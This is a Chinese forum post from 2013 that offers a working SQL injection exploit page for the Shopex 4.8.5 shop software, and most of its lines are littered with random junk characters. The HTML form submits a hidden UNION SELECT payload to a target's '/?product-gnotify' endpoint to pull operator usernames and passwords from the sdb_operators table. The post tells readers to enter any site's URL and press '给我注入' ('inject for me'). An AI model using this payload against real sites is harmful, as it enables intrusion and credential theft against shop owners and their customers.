<center>7 T2 u4 \% K- S! Y* g, f. z7 @9 v
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>: T3 g! Z) `8 F- [4 n2 _
<form action="" method="post" name="submit_url">) w1 r+ `9 S. q9 ~' `# I
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>: c; @9 x3 _: b7 y/ a* h* P
<input type="hidden" name="goods[goods_id]" value="3">
9 L* o* C( v2 t6 I! x. U2 C<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">% i/ \: u; Y: c( a; w& l$ ?& A4 A8 {
<input type="submit" value="给我注入" onclick=fsubmit()>8 z/ W: k, m# u* }4 o, F
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
- X. k& }% Y6 w* ^/ p6 B; A: B* \& T6 V% i) J! P; X7 Q
<script>
3 S! E$ O/ J) Y6 ^0 C2 \1 _" a, Lfunction fsubmit(){ ' @1 l ^' @: d o) ^! i
form = document.forms[0]; * [2 \ O0 Z" c5 v% o& b
form.action = form.url.value+'/?product-gnotify';
$ [. x* k7 g/ P' B# nform.submit(); ! W/ ?3 j6 Z3 x7 U9 ?- |5 ~/ d9 v
}
* E! H$ H, v; z</script>7 W" X3 H% W+ ?8 h/ l5 U$ i. I
|
发表于 2013-1-23 09:20:52
收藏
支持
反对